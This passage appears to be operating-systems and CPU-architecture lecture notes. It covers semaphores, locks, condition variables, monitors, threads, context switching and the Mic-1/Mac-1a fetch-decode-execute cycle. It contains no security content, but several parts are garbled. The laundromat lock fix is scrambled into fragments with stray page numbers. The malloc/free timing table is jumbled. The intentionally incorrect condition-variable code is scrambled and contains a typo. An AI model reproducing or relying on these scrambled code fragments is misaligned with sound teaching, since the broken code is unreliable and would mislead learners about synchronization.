    void P();
    void V();
};

Here is what the operations do:

o Semaphore(name, count): creates a semaphore and initializes the counter to count.
o P(): Atomically waits until the counter is greater than 0, then decrements the counter and returns.
o V(): Atomically increments the counter.

Here is how we can use the semaphore to make the sum example work:

int a = 0;
Semaphore *s;

void sum(int p) {
    int t;
    s->P();
    a++;
    t = a;
    s->V();
    print("%d : a = %d\n", p, t);
}

void main() {
    Thread *t = new Thread("child");
    s = new Semaphore("s", 1);
    t->Fork(sum, 1);
    sum(0);
}

We are using semaphores here to implement a mutual exclusion mechanism. The idea behind mutual exclusion is that only one thread at a time should be allowed to do something; in this case, only one thread should access a. We use mutual exclusion to make operations atomic. The code that performs the atomic operation is called a critical section.

But semaphores do much more than mutual exclusion. They can also be used to synchronize producer/consumer programs. The idea is that the producer is generating data and the consumer is consuming data. So a Unix pipe has a producer and a consumer. You can also think of a person typing at a keyboard as a producer and the shell program reading the characters as a consumer.

Here is the synchronization problem: make sure that the consumer does not get ahead of the producer. But we would like the producer to be able to produce without waiting for the consumer to consume. Semaphores can be used to do this. Here is how it works:

Semaphore *s;

void consumer(int dummy) {
    while (1) {
        s->P();
        consume the next unit of data
    }
}

void producer(int dummy) {
    while (1) {
        produce the next unit of data
        s->V();
    }
}

void main() {
    s = new Semaphore("s", 0);
    Thread *t = new Thread("consumer");
    t->Fork(consumer, 1);
    t = new Thread("producer");
    t->Fork(producer, 1);
}

In some sense the semaphore is an abstraction of the collection of data.

In the real world, pragmatics intrude. If we let the producer run forever and never run the consumer, we have to store all of the produced data somewhere — and no machine has an infinite amount of storage. So, we want to let the producer get ahead of the consumer if it can, but only a given amount ahead. We need to implement a bounded buffer which can hold only N items. If the bounded buffer is full, the producer must wait before it can put any more data in.

Semaphore *full;
Semaphore *empty;

void consumer(int dummy) {
    while (1) {
        full->P();
        consume the next unit of data
        empty->V();
    }
}

void producer(int dummy) {
    while (1) {
        empty->P();
        produce the next unit of data
        full->V();
    }
}

void main() {
    empty = new Semaphore("empty", N);
    full = new Semaphore("full", 0);
    Thread *t = new Thread("consumer");
    t->Fork(consumer, 1);
    t = new Thread("producer");
    t->Fork(producer, 1);
}
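For readers who want to run the pattern outside Nachos, here is a hedged modern-C++ rendering of the same bounded buffer (it assumes C++20 for std::counting_semaphore; the capacity, item type and item count are illustrative, and a mutex is added to protect the queue itself):

#include <cstdio>
#include <mutex>
#include <queue>
#include <semaphore>
#include <thread>

constexpr int N = 4;                         // buffer capacity
std::counting_semaphore<N> empty_slots(N);   // how many slots are free
std::counting_semaphore<N> full_slots(0);    // how many items are available
std::mutex m;                                // protects the queue itself
std::queue<int> buffer;

void producer() {
    for (int i = 0; i < 20; i++) {
        empty_slots.acquire();               // P(empty): wait for a free slot
        { std::lock_guard<std::mutex> g(m); buffer.push(i); }
        full_slots.release();                // V(full): an item is ready
    }
}

void consumer() {
    for (int i = 0; i < 20; i++) {
        full_slots.acquire();                // P(full): wait for an item
        int item;
        { std::lock_guard<std::mutex> g(m); item = buffer.front(); buffer.pop(); }
        empty_slots.release();               // V(empty): the slot is free again
        std::printf("consumed %d\n", item);
    }
}

int main() {
    std::thread p(producer), c(consumer);
    p.join();
    c.join();
    return 0;
}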

An example of where you might use a producer and consumer in an operating system is the console (a device that reads and writes characters from and to the system console). You would probably use semaphores to make sure you don't try to read a character before it is typed.

Semaphores are one synchronization abstraction. There is another: locks and condition variables. Locks are an abstraction specifically for mutual exclusion only. In assignment 1 you will implement locks in Nachos on top of semaphores. Here is the Nachos lock interface:

class Lock {
  public:
    Lock(char* debugName);      // initialize lock to be FREE
    ~Lock();                    // deallocate lock
    void Acquire();             // these are the only operations on a lock
    void Release();             // they are both *atomic*
};

A lock can be in one of two states: locked and unlocked. Semantics of the lock operations:

o Lock(name): creates a lock that starts out in the unlocked state.
o Acquire(): Atomically waits until the lock state is unlocked, then sets the lock state to locked.
o Release(): Atomically changes the lock state to unlocked from locked.

What are the requirements for a locking implementation?

o Only one thread can acquire the lock at a time. (safety)
o If multiple threads try to acquire an unlocked lock, one of the threads will get it. (liveness)
o All unlocks complete in finite time. (liveness)

What are desirable properties for a locking implementation?

o Efficiency: take up as few resources as possible.
o Fairness: threads acquire the lock in the order they ask for it. There are also weaker forms of fairness.
o Simple to use.

When using locks, you typically associate a lock with each piece of data that multiple threads access. When one thread wants to access a piece of data, it first acquires the lock, then performs the access, then unlocks the lock. So the lock allows threads to perform complicated atomic operations on each piece of data.

Can you implement an unbounded buffer using only locks? There is a problem: if the consumer wants to consume a piece of data before the producer produces the data, it must wait. But locks do not allow the consumer to wait until the producer produces the data, so the consumer must loop until the data is ready. This is bad because it wastes CPU resources.

There is another synchronization abstraction called condition variables, just for this kind of situation. Here is the Nachos interface:

class Condition {
  public:
    Condition(char* debugName);
    ~Condition();
    void Wait(Lock *conditionLock);
    void Signal(Lock *conditionLock);
    void Broadcast(Lock *conditionLock);
};

Semantics of the condition variable operations:

o Condition(name): creates a condition variable.
o Wait(Lock *l): Atomically releases the lock and waits. When Wait returns, the lock will have been reacquired.

o Signal(Lock *l): Enables one of the waiting threads to run. When Signal returns, the lock is still acquired.
o Broadcast(Lock *l): Enables all of the waiting threads to run. When Broadcast returns, the lock is still acquired.

All of the operations on a given condition variable must use the same lock. In assignment 1 you will implement condition variables in Nachos on top of semaphores.

Typically, you associate a lock and a condition variable with a data structure. Before the program performs an operation on the data structure, it acquires the lock. If it has to wait before it can perform the operation, it uses the condition variable to wait for another operation to bring the data structure into a state where it can perform the operation. In some cases you need more than one condition variable.

Let's say that we want to implement an unbounded buffer using locks and condition variables. In this case we have 2 consumers.

Lock *l;
Condition *c;
int avail = 0;

void consumer(int dummy) {
    while (1) {
        l->Acquire();
        if (avail == 0) c->Wait(l);
        consume the next unit of data
        avail--;
        l->Release();
    }
}

void producer(int dummy) {
    while (1) {
        l->Acquire();
        produce the next unit of data
        avail++;
        c->Signal(l);
        l->Release();
    }
}

void main() {
    l = new Lock("l");
    c = new Condition("c");
    Thread *t = new Thread("consumer");
    t->Fork(consumer, 1);
    t = new Thread("consumer");
    t->Fork(consumer, 2);
    t = new Thread("producer");
    t->Fork(producer, 1);
}

There are two variants of condition variables: Hoare condition variables and Mesa condition variables. For Hoare condition variables, when one thread performs a Signal, the very next thread to run is the waiting thread. For Mesa condition variables, there are no guarantees about when the signalled thread will run; other threads that acquire the lock can execute between the signaler and the waiter. The example above will work with Hoare condition variables, but not with Mesa condition variables.

What is the problem with Mesa condition variables? Consider the following scenario: three threads, with thread 1 producing data and threads 2 and 3 consuming data.

o Thread 2 calls consumer, and suspends in Wait.
o Thread 1 calls producer, and signals thread 2.
o Instead of thread 2 running next, thread 3 runs next, calls consumer, and consumes the element. (Note: with Hoare monitors, thread 2 would always run next, so this would not happen.)
o Thread 2 runs, and tries to consume an item that is not there. Depending on the data structure used to store produced items, it may get some kind of illegal access error.

How can we fix this problem? Replace the if with a while:

void consumer(int dummy) {
    while (1) {
        l->Acquire();
        while (avail == 0) c->Wait(l);
        consume the next unit of data
        avail--;
        l->Release();
    }
}

In general, this is a crucial point: always put a while around your condition variable code. If you don't, you can get really obscure bugs that show up very infrequently.

In this example, what is the data that the lock and condition variable are associated with? The avail variable.

People have developed a programming abstraction that automatically associates locks and condition variables with data. This abstraction is called a monitor. A monitor is a data structure plus a set of operations (sort of like an abstract data type). The monitor also has a lock and, optionally, one or more condition variables. The compiler for a monitor language automatically inserts a lock operation at the beginning of each routine and an unlock operation at the end of the routine, so the programmer does not have to put in the lock operations and it is not possible to mismatch the lock acquire and release.

Monitor languages were popular in the middle 80's — they are in some sense safer, because they eliminate one possible programming error. But more recent languages have tended not to support monitors explicitly, and instead expose the locking operations to the programmer; the programmer has to insert the lock and unlock operations by hand. Java takes a middle ground: it supports monitors, but also allows programmers to exert finer-grain control over the locked sections by supporting synchronized blocks within methods. Synchronized blocks still present a structured model of synchronization, so it is not possible to mismatch the lock acquire and release.

Laundromat Example: A local Laundromat has switched to a computerized machine allocation scheme. There are N machines, numbered 1 to N. By the front door there are P allocation stations. When you want to wash your clothes, you go to an allocation station and put in your coins. The allocation station gives you a number, and you use that machine. There are also P deallocation stations. When your clothes finish, you give the number back to one of the deallocation stations, and someone else can use the machine. Here is the alpha release of the machine allocation software:

allocate(int dummy) {
    while (1) {
        wait for coins from user
        n = get();
        give number n to user
    }
}

deallocate(int dummy) {
    while (1) {
        wait for number n from user
        put(n);
    }
}

Lock *l. main () for (i = 0. i < N. 58 . i < P. i++) if (a[i] == 0) { A[i] = 1. } • • It seems that the alpha software isn't doing all that well. l->Release (). i < N. return (i+1). int a[N]. void put (int i) a [i-1] = 0.put (i). Just looking at the software. int get() { for (i = 0. 0). } • The key parts of the scheduling are done in the two routines get and put. t->Fork(deallocate. for (i = 0. which use an array data structure a to keep track of which machines are in use and which are free. Why does this happen? We can fix this with a lock: int a[N]. i++) { t = new Thread ("allocate"). t = new Thread ("deallocate"). 0). you can see that there are several synchronization problems. The first problem is that sometimes two people are assigned to the same machine. i++) if (a [i] == 0) a [i] = 1. int get () l->Acquire (). t->Fork(allocate.

What data is the lock protecting? The a array.

So now we have fixed the multiple assignment problem. But what happens if someone comes into the laundry when all of the machines are already taken? What does get return? We must fix it so that the system waits until there is a machine free before it returns a number. The situation calls for condition variables:

int a[N];
Lock *l;
Condition *c;

int get() {
    l->Acquire();
    while (1) {
        for (i = 0; i < N; i++)
            if (a[i] == 0) {
                a[i] = 1;
                l->Release();
                return (i+1);
            }
        c->Wait(l);
    }
}

void put(int i) {
    l->Acquire();
    a[i-1] = 0;
    c->Signal(l);
    l->Release();
}

When would you use a broadcast operation? Whenever you want to wake up all waiting threads, not just one. For an event that happens only once, for example, a bunch of threads may wait until a file is deleted; the thread that actually deleted the file could use a broadcast to wake up all of the threads.

Also use a broadcast for allocation/deallocation of variable-sized units. Example: concurrent malloc/free.

Lock *l;
Condition *c;

char *malloc(int s) {
    l->Acquire();
    while (cannot allocate a chunk of size s)
        c->Wait(l);
    allocate chunk of size s;
    l->Release();
    return pointer to allocated chunk;
}

void free(char *m) {
    l->Acquire();
    deallocate m;
    c->Broadcast(l);
    l->Release();
}

Example with malloc/free. Initially we start out with 10 bytes free.

Time  Process 1                  Process 2                     Process 3
 1    malloc(10) - succeeds      malloc(5) - suspends on lock  malloc(5) - suspends on lock
 2                               gets lock - waits
 3                                                             gets lock - waits
 4    free(10) - broadcast
 5                               resume malloc(5) - succeeds
 6                                                             resume malloc(5) - succeeds
 7    malloc(7) - waits
 8                                                             malloc(3) - waits
 9                               free(5) - broadcast
10    resume malloc(7) - waits                                 resume malloc(3) - succeeds

Some of the similarities and differences are: 61 . The following implementation is INCORRECT. sema->P().waits resume malloc(5) . class Condition private: int waiting. What would happen if changed while loop to an if? • You will be asked to implement condition variables as part of assignment 1.succeeds What would happen if changed c->Broadcast(l) to c->Signal(l)? At step 10.5 6 7 8 9 10 resume malloc(7) . l->Release(). waiting--. As we mentioned earlier that in many respect threads operate in the same way as that of processes. void Condition::Signal (Lock* l) if (waiting > 0) seamy->V ().broadcast malloc(7) . l->Acquire(). and it would not get the chance to allocate available memory.waits free(5) . void Condition::Wait (Lock* l) waiting++. Semaphore *sema. Please do not turn this implementation in. process 3 would not wake up.succeeds malloc(3) .waits resume malloc(3) .

Similarities

• Like processes, threads share the CPU, and only one thread is active (running) at a time.
• Like processes, threads within a process execute sequentially.
• Like processes, a thread can create children.
• Like processes, if one thread is blocked, another thread can run.

Differences

• Unlike processes, threads are not independent of one another.
• Unlike processes, all threads can access every address in the task.
• Unlike processes, threads are designed to assist one another. (Processes might or might not assist one another, because processes may originate from different users.)

Why Threads?

Following are some reasons why we use threads in designing operating systems:

1. A process with multiple threads makes a great server, for example a printer server.
2. Because threads can share common data, they do not need to use interprocess communication.
3. Because of their very nature, threads can take advantage of multiprocessors.

Threads are cheap in the sense that:

1. They only need a stack and storage for registers; therefore, threads are cheap to create.
2. Threads use very few resources of the operating system in which they are working: threads do not need a new address space, global data, program code or operating system resources.
3. Context switching is fast when working with threads: we only have to save and/or restore the PC, SP and registers.

But this cheapness does not come free: the biggest drawback is that there is no protection between threads.

User Level Threads and Kernel Level Threads

User-Level Threads

User-level threads are implemented in user-level libraries, rather than via system calls, so thread switching does not need to call the operating system or cause an interrupt to the kernel. In fact, the kernel knows nothing about user-level threads and manages them as if they were single-threaded processes.

Advantages:

• The most obvious advantage of this technique is that a user-level threads package can be implemented on an operating system that does not support threads.
• User-level threads do not require modification to the operating system.
• Simple Representation: each thread is represented simply by a PC, registers, stack and a small control block, all stored in the user process's address space.
• Simple Management: creating a thread, switching between threads and synchronization between threads can all be done without intervention of the kernel.
• Fast and Efficient: thread switching is not much more expensive than a procedure call.

Disadvantages:

• There is a lack of coordination between threads and the operating system kernel. Therefore, the process as a whole gets one time slice, irrespective of whether the process has one thread or 1000 threads within it. It is up to each thread to relinquish control to the other threads.
• User-level threads require non-blocking system calls, i.e. a multithreaded kernel. Otherwise, the entire process will be blocked in the kernel, even if there are runnable threads left in the process. For example, if one thread causes a page fault, the whole process blocks.

Kernel-Level Threads

In this method, the kernel knows about and manages the threads. No runtime system is needed in this case. Instead of a thread table in each process, the kernel has a thread table that keeps track of all threads in the system. In addition, the kernel also maintains the traditional process table to keep track of processes. The operating system kernel provides system calls to create and manage threads.

Advantages:

• Because the kernel has full knowledge of all threads, the scheduler may decide to give more time to a process having a large number of threads than to a process having a small number of threads.
• Kernel-level threads are especially good for applications that frequently block.

Disadvantages:

• Kernel-level threads are slow and inefficient. For instance, thread operations are hundreds of times slower than user-level threads.
• Since the kernel must manage and schedule threads as well as processes, it requires a full thread control block (TCB) for each thread to maintain information about threads. As a result there is significant overhead and increased kernel complexity.

Advantages of Threads over Multiple Processes

• Context Switching: Threads are very inexpensive to create and destroy, and they are inexpensive to represent. For example, they require space to store the PC, the SP, and the general-purpose registers, but they do not require space to store memory information, information about open files or I/O devices in use, etc. With so little context, it is much faster to switch between threads; in other words, a context switch using threads is relatively easy.
• Sharing: Threads allow the sharing of many resources that cannot be shared between processes — for example, sharing the code section, the data section, and operating system resources like open files.

Disadvantages of Threads over Multiprocesses

• Blocking: The major disadvantage is that if the kernel is single-threaded, a system call by one thread will block the whole process, and the CPU may be idle during the blocking period.
• Security: Since there is extensive sharing among threads, there is a potential problem of security. It is quite possible that one thread overwrites the stack of another thread (or damages shared data), although it is very unlikely, since threads are meant to cooperate on a single task.

Application that Benefits from Threads

A proxy server satisfying the requests of a number of computers on a LAN would benefit from a multi-threaded process. In general, any program that has to do more than one task at a time could benefit from multitasking. For example, a program that reads input, processes it, and outputs the result could have three threads, one for each task.

Application that cannot Benefit from Threads

Any sequential process that cannot be divided into parallel tasks will not benefit from threads. For example, a program that displays the time of day would not benefit from multiple threads.

Resources used in Thread Creation and Process Creation

When a new thread is created, it shares its code section, data section and operating system resources (like open files) with the other threads, but it is allocated its own stack, register set and program counter. The creation of a new process differs from that of a thread mainly in the fact that all the resources that are shared among threads must be provided explicitly for each process. So, though two processes may be running the same piece of code, they each need their own copy of the code in main memory to be able to run. Two processes also do not share other resources with each other. This makes the creation of a new process very costly compared to that of a new thread.

Context Switch

To give each process on a multiprogrammed machine a fair share of the CPU, a hardware clock generates interrupts periodically. This allows the operating system to schedule all processes in main memory (using a scheduling algorithm) to run on the CPU at equal intervals. Each time a clock interrupt occurs, the interrupt handler checks how much time the current running process has used. If it has used up its entire time slice, then the CPU scheduling algorithm (in the kernel) picks a different process to run. Each switch of the CPU from one process to another is called a context switch.

In a multiprogrammed uniprocessor computing system, context switches occur frequently enough that all processes appear to be running concurrently.

Major Steps of Context Switching

• The values of the CPU registers are saved in the process table entry of the process that was running just before the clock interrupt occurred.
• The registers are loaded from the process picked by the CPU scheduler to run next.

Action of Kernel to Context Switch among Threads

Threads share a lot of resources with the other peer threads belonging to the same process, so a context switch among threads of the same process is easy: it involves a switch of the register set, the program counter and the stack. It is relatively easy for the kernel to accomplish this task. (This is the case if threads are implemented at the kernel level. Threads can also be implemented entirely at the user level in run-time libraries; since in that case no thread scheduling is provided by the operating system, it is the responsibility of the programmer to yield the CPU frequently enough in each thread so that all threads in the process can make progress.)

Action of Kernel to Context Switch among Processes

Context switches among processes are expensive. Before a process can be switched, its process control block (PCB) must be saved by the operating system. The PCB consists of the following information:

• The process state.
• The program counter, PC.
• The values of the different registers.
• The CPU scheduling information for the process.
• Memory management information regarding the process.
• Possible accounting information for this process.
• I/O status information of the process.

When the PCB of the currently executing process has been saved, the operating system loads the PCB of the next process that is to run on the CPU. This is a heavy task and it takes a lot of time.
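As an illustration of the PCB contents listed above — the field names and sizes here are hypothetical, not taken from any particular kernel — a minimal declaration might look like:

#include <cstdint>

// A minimal sketch of a process control block; purely illustrative.
struct ProcessControlBlock {
    int       state;            // process state: e.g. RUNNING, READY, WAITING
    uintptr_t pc;               // saved program counter
    uintptr_t registers[32];    // saved general-purpose register values
    int       priority;         // CPU scheduling information
    uintptr_t page_table_base;  // memory management information
    long      cpu_time_used;    // accounting information
    int       open_files[16];   // I/O status information (open descriptors)
};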

User Threads

User threads are implemented entirely in user space. The programmer of the thread library writes code to synchronize threads and to context switch them, and they all run in one process. The operating system is unaware that a thread system is even running. Because the OS treats the running process like any other, there is no additional kernel overhead for user-level threads. However, the user-level threads only run when the OS has scheduled their underlying process (so making a blocking system call blocks all the threads), and user-level threads replicate some amount of kernel-level functionality in user space. Examples of user-level thread systems are Nachos and Java (on OSes that don't support kernel threads).

Kernel Threads

Some OS kernels support the notion of threads and schedule them directly. There are system calls to create threads and manipulate them in ways similar to processes. Synchronization and scheduling may be provided by the kernel. Kernel-level threads have more overhead in the kernel (a kernel thread control block) and more overhead in their use (manipulating them requires a system call). However, the abstraction is cleaner (threads can make system calls independently).

CHAPTER 5 THE CENTRAL PROCESSING UNIT (CPU)

This chapter gives some more detail on the Central Processing Unit (CPU) and leads up to the point where we can write significant programs in assembly/machine code. First we give an overview of how a processor and memory function together to execute a single machine instruction — the famous fetch-decode-execute cycle. Then we give a qualitative discussion of how the processor executes program instructions, and what must happen in it to cause useful things to happen, i.e. to cause program instructions to be executed. Finally we describe the execution of instructions in some detail, i.e. how the fetching, decoding and execution of a machine instruction can be implemented by the execution of a set of sequencing steps called a microprogram.

A CPU consists of three major parts:

1. The internal registers, the ALU and the connecting buses — sometimes called the data path.
2. The control part, which directs the activities of the data path and the input-output interface, e.g. selecting the ALU function, opening and closing access to buses, etc.
3. The input-output interface, which is the gateway through which data are sent to and received from main memory and input-output devices.

A fourth part, main memory, is never far from the CPU, but from a logical point of view it is best kept separate.

The Architecture of Mic-1

Figure 6.1 shows the data path part of our hypothetical CPU from (Tanenbaum, Structured Computer Organisation, 3rd ed., 1990), page 170 onwards. In the system we describe, the control part is implemented by a microprogram. (Note on terminology: the term microprogram was devised in the early 1950s, long before microprocessors were ever dreamt of.) We will pay most attention to the data path part of the processor and avoid going into much detail about the control. Here, we briefly describe the components of Figure 6.1.

Figure 6.1: Mic-1 CPU (from Tanenbaum, Structured Computer Organisation, 3rd ed., 1990)

Registers

There are 16 identical 16-bit registers, but they are not general purpose; each has a special use:

PC, program counter: The PC points to the memory location that holds the next instruction to be executed.

AC, accumulator: The accumulator is like the display register in a calculator. Most operations use it implicitly as an unmentioned input, and the result of any operation is placed in it.

SP, stack pointer: Used for maintaining a data area called the stack. The stack is used for remembering where we came from when we call subprograms; it is also used as a communication medium for passing data to subprograms; it is used as a storage area for local variables in subprograms; and finally, it is used for remembering data when an interrupt is being processed.

IR, instruction register: Holds the instruction (the actual instruction data) currently being executed.

TIR, temporary instruction register: Holds temporary versions of the instruction while it is being decoded.

0, +1, -1: Constants. They are used so often that it is handy to have copies of them close by — this avoids wasting time accessing main memory.

AMASK: Another constant, used for masking (anding) the address part of the instruction.

SMASK: Ditto, for stack (relative) addresses.

A, B, C, D, E, F: General purpose registers — but general purpose only for the microprogrammer. The assembly language cannot address them; for now, we can ignore them.

Internal Buses

There are three internal buses: the A and B (source) buses and the C (destination) bus.

External Buses

The address bus and the data bus. A minor point to note: many buses, in particular those in many of the Intel 80X86 family, use the same physical bus (connections) for both address and data. This is simple to do — the control part of the bus just has to make sure all users of the bus know when it carries data and when it carries an address.

Latches

The A and B latches hold stable versions of the A and B buses. There would be problems if, for example, the output of the ALU were connected to AC while, meanwhile, AC was connected straight into the A input of the ALU: the answer would be continuously changing.

A-Multiplexer (AMUX)

The ALU input A can be fed with either: (i) the contents of the A latch, or (ii) the contents of MBR.

ALU

In Mac-1a the ALU may perform just one of four functions:

0: A + B (note `plus', rather than or);
1: A AND B;
2: A, straight through;
3: NOT A.

Any other functions have to be programmed.

Shifter

The shifter is not a register — it passes the ALU output straight through: shifted left, shifted right or not shifted.

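A tiny sketch of the four ALU functions above, written as a C++ function (the function-select encoding follows the list above; everything else is illustrative):

#include <cstdint>
#include <cstdio>

// The four Mac-1a ALU functions, selected by a 2-bit function code f.
uint16_t alu(int f, uint16_t a, uint16_t b) {
    switch (f) {
        case 0:  return (uint16_t)(a + b);   // plus (arithmetic, not or)
        case 1:  return (uint16_t)(a & b);   // and
        case 2:  return a;                   // A, straight through
        default: return (uint16_t)~a;        // not A (code 3)
    }
}

int main() {
    std::printf("%04x\n", alu(0, 0x0022, 0x0033));   // prints 0055
    return 0;
}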
Memory Address Register (MAR), Memory Buffer Register (MBR) and Memory

The MAR is a register which is used as a gateway — a `buffer' — onto the address bus. Likewise the MBR (it might be better to call it the memory data register) for the data bus.

The memory is considered to be a collection of cells or locations, each of which can be addressed individually, and thus written to or read from; i.e. memory is like an array in C, Basic or any other high-level language. For brevity, we shall refer to this memory `array' as M, and to the address of a general cell as x; so M[x] denotes the contents of the cell at address x.

To read from a memory cell, the controller must cause the following to happen:

1. Put an address, x, in MAR.
2. Request a read — by asserting a read control line.
3. At some time later, the contents of the cell at address x, M[x], appear in MBR.
4. The controller can then cause the contents of MBR to be transferred to the AC or somewhere else.

To write to a memory cell, the controller must cause something similar to happen:

1. Put an address, x, in MAR.
2. Put the data in MBR.
3. Request a write — by asserting a write control line.
4. At some time later, the data arrive in memory cell x.

Register Transfer Language

To describe the details of the operation of the CPU, we use a simple language called Register Transfer Language (RTL). The notation is as follows:

• Reg denotes a register, e.g. AC, IR, PC, R1 or R2.
• M[x] denotes the contents of the memory location whose address is x. Think of an envelope with £100 in it, and your address on it: x is the address, and the £100 is the contents, M[x].
• M[M[x]] denotes the contents of the location whose address is contained in location x — think of an envelope containing another address, rather than money.
• ← denotes transfer; we say AC ← M[x] as `AC gets contents of x'. Transfers between registers are written similarly, e.g. Ret ← PC. Pronounce A ← B as `A gets B'.

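As a small worked example in this notation (a sketch only — the exact microinstruction timing of the Mic-1 is covered later; here we simply assume the memory takes two cycles to respond), loading AC from memory cell x might be written:

    MAR ← x; rd        { put the address in MAR and assert the read line }
    rd                 { keep the read line asserted while memory responds }
    AC ← MBR           { the contents M[x] have arrived in MBR; copy to AC }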
Simple Model of a Computer — Part 3

Back in section 2.7 we produced a simple model of a computer. Here we show it again.

Figure 6.2: Mechanical Computer

It is a feature of all general purpose computers that executable instructions and data occupy the same memory space. There is no fundamental reason, except tidiness and efficiency, why instructions and data cannot be mixed up together; but often, programs are organised so that there are blocks of instructions and blocks of data.

At the end of section 2.7 we admitted that we had been telling only half the truth: we had to fit the program into memory as well. Recall what was needed: add the contents of memory cell 0 to the contents of memory cell 1; store the result in cell 2; and, if the result is greater-than-or-equal-to 40, put 1 in cell 3, otherwise put 0 in cell 3. (We are adding marks, and cell 3 contains an indicator of Pass (1) or Fail (0).)

In this more realistic model, the person operating the CPU has no list of instructions available on the desk, but must read one instruction at a time from memory. We are going to use the same program, with appropriate numerical codes (so that the instructions can be stored in memory). I have to renumber the program steps from P1-P14 to P101..., for reasons which will soon become evident. Also, we will use hexadecimal numbering.

The numerically coded instruction is given as four hexadecimal digits: the first digit gives the operation required (load, add, store, ...) — the opcode; the last three digits give the address or data — the operand. The opcodes are as follows:

Figure 6.3: Opcodes

And the program; fine, here goes.

P101: Load the contents of memory 0 into AC. Code: 0 000
P102: Add the contents of memory 1 to the contents of AC. Code: 2 001
P103: Store the contents of AC in memory 2. Code: 1 002
P104: Load the constant 40 into AC. Code: 7 028 (40 dec is 28 hex)
P105: Store the contents of AC in memory 4. Code: 1 004
P106: Load the contents of memory 2 into AC. Code: 0 002
P107: Subtract the contents of memory 4 from the contents of AC. Code: 3 004
P108: If AC is positive, jump to instruction P10c. Code: 4 10c
P109: Load the constant 0 into AC. Code: 7 000
P10a: Store the contents of AC in memory 3. Code: 1 003
P10b: Jump to P10e. Code: 6 10e
P10c: Load the constant 1 into AC. Code: 7 001
P10d: Store the contents of AC in memory 3. Code: 1 003
P10e: Stop.

We now have to revise Figure 6.2 to show the program; see Figure 6.4. The revisions are as follows:

• Show the additional memory (containing the program).
• Show a Program Counter (PC) register that keeps track of the address of the next instruction.
• Show the Instruction Register (IR); this tells the CPU operator what to do for the current step.

Figure 6.4: Mechanical Computer with Program

The CPU is a pretty busy place!

The Fetch-Decode-Execute Cycle

How do the CPU and its controller execute a sequence of instructions? Let us start by considering the execution of the instruction at location 0x100: Add the contents of memory 1 to the contents of AC (2 001). In this revised model, the CPU operator has no list of instructions on his/her desk (the CPU); he/she must go through the following cycle of steps for each instruction. What follows is an endless loop of the so-called fetch-decode-execute cycle:

Fetch: Read the next instruction and put it in the Instruction Register. We've already done this sort of thing: (a) take the number in the PC; (b) place it in MAR; (c) shout "Bus!"; (d) add one to the number in the PC — to make it point to the next step, ready for the next Fetch; (e) wait until a new number arrives in the MBR; (f) take the number in the MBR and put it in the Instruction Register.

Decode: Figure out what the instruction means. (a) Take the number in IR; (b) take the top digit — the opcode — look it up in Figure 6.3, and see what has to be done (in the case shown, the opcode is 2: add the contents of a memory location to AC); (c) take the number in the bottom three digits — this signifies the operand (here, 001).

Execute: Perform the action required. `Add' is done as follows: (a) write 1 on a piece of paper and place it in MAR; (b) put a tick against Read; (c) shout "Bus!"; (d) some time later, the contents of cell 1 (33) will arrive in MBR; (e) look at what is in AC and in MBR, and use the calculator to add them (22 + 33); (f) we want to retain the result, so write down a copy of the result and put it in AC — a piece of paper with 55 on it would be put into AC. (For a store instruction, the contents of AC would instead be copied to memory.) If the operation is a JUMP type instruction, then all the operator does is take the operand (the jump-to address) and place it in the PC — thus stopping the PC pointing to the next instruction in sequence; if necessary (a conditional jump), first check the condition, then revise the PC to point to the jumped-to instruction.

Go back to Fetch.

There we have it: the famous fetch-decode-execute cycle.

We will call the machine Mac-1a; it is a restricted version of Tanenbaum's Mac-1 (we will neglect Tanenbaum's local and indirect addressing for the meanwhile). The main characteristics of Mac-1a are: data word length 16 bits; address size 12 bits. It is accumulator based: that is, everything is done through AC. There are two addressing modes: immediate and direct.

Exercise. What is the maximum number of words we can have in the main memory of Mac-1a? (Neglect memory-mapped input-output.) How many bytes?
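To make the cycle concrete, here is a minimal interpreter sketch for a Mac-1a-like machine in C++. The opcode values follow Figure 6.3 as used in the program above (0 load, 1 store, 2 add, 3 subtract, 4 jump-if-positive, 6 jump, 7 load constant); the rest is assumption for illustration: the program is loaded so that step P101 sits at address 0x101 (making the jump targets 0x10c and 0x10e line up), "jump if positive" is taken to mean AC >= 0, and 0xF000 is an invented halt code — Mac-1a has no such instruction.

#include <cstdint>
#include <cstdio>

int main() {
    uint16_t M[4096] = {0};   // 12-bit address space: 4096 words
    // The marks program from above (P101..P10d), plus an assumed halt at P10e:
    uint16_t prog[] = {0x0000, 0x2001, 0x1002, 0x7028, 0x1004, 0x0002, 0x3004,
                       0x410c, 0x7000, 0x1003, 0x610e, 0x7001, 0x1003, 0xF000};
    for (int i = 0; i < 14; i++) M[0x101 + i] = prog[i];
    M[0] = 22; M[1] = 33;                       // the two marks to be added

    uint16_t pc = 0x101;                        // program counter
    int16_t  ac = 0;                            // accumulator
    for (;;) {
        uint16_t ir = M[pc++];                  // fetch (and bump PC)
        uint16_t opcode  = ir >> 12;            // decode: top hex digit
        uint16_t operand = ir & 0x0FFF;         // bottom three hex digits
        switch (opcode) {                       // execute
            case 0: ac = (int16_t)M[operand]; break;      // load direct
            case 1: M[operand] = (uint16_t)ac; break;     // store direct
            case 2: ac += (int16_t)M[operand]; break;     // add direct
            case 3: ac -= (int16_t)M[operand]; break;     // subtract direct
            case 4: if (ac >= 0) pc = operand; break;     // jump if AC >= 0
            case 6: pc = operand; break;                  // unconditional jump
            case 7: ac = (int16_t)operand; break;         // load constant
            default: goto halted;               // any other code: halt (assumed)
        }
    }
halted:
    std::printf("sum = %d, pass = %d\n", M[2], M[3]);     // expect 55 and 1
    return 0;
}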

Instruction Set

We now examine the instruction set by which assembly programmers can program the machine. The Mac-1a programmer has no access to the PC or other CPU registers; also, for present purposes, assume that SP does not exist.

A limited version of the Mac-1 instruction set is shown in Figure 6.5. The columns are as follows:

• Binary code for instruction: i.e. machine code — what the instruction looks like in computer memory.
• Mnemonic: the name given to the instruction; used when coding in assembly code.
• Long name: a descriptive name for the instruction.
• Action: what the instruction actually does, described formally in register transfer language (RTL).

Figure 6.5: Mac-1a Instruction Set (limited version of Mac-1)

Microprogram Control versus Hardware Control

Control of the CPU — fetch, decode, execute — is done by a microcontroller which obeys a program of microinstructions. We might think of the microcontroller as a black box such as that shown in Figure 6.6: it has a set of inputs and a set of outputs, just like any other circuit.

Figure 6.6: Controller Black-box, either Microcontroller or Logic

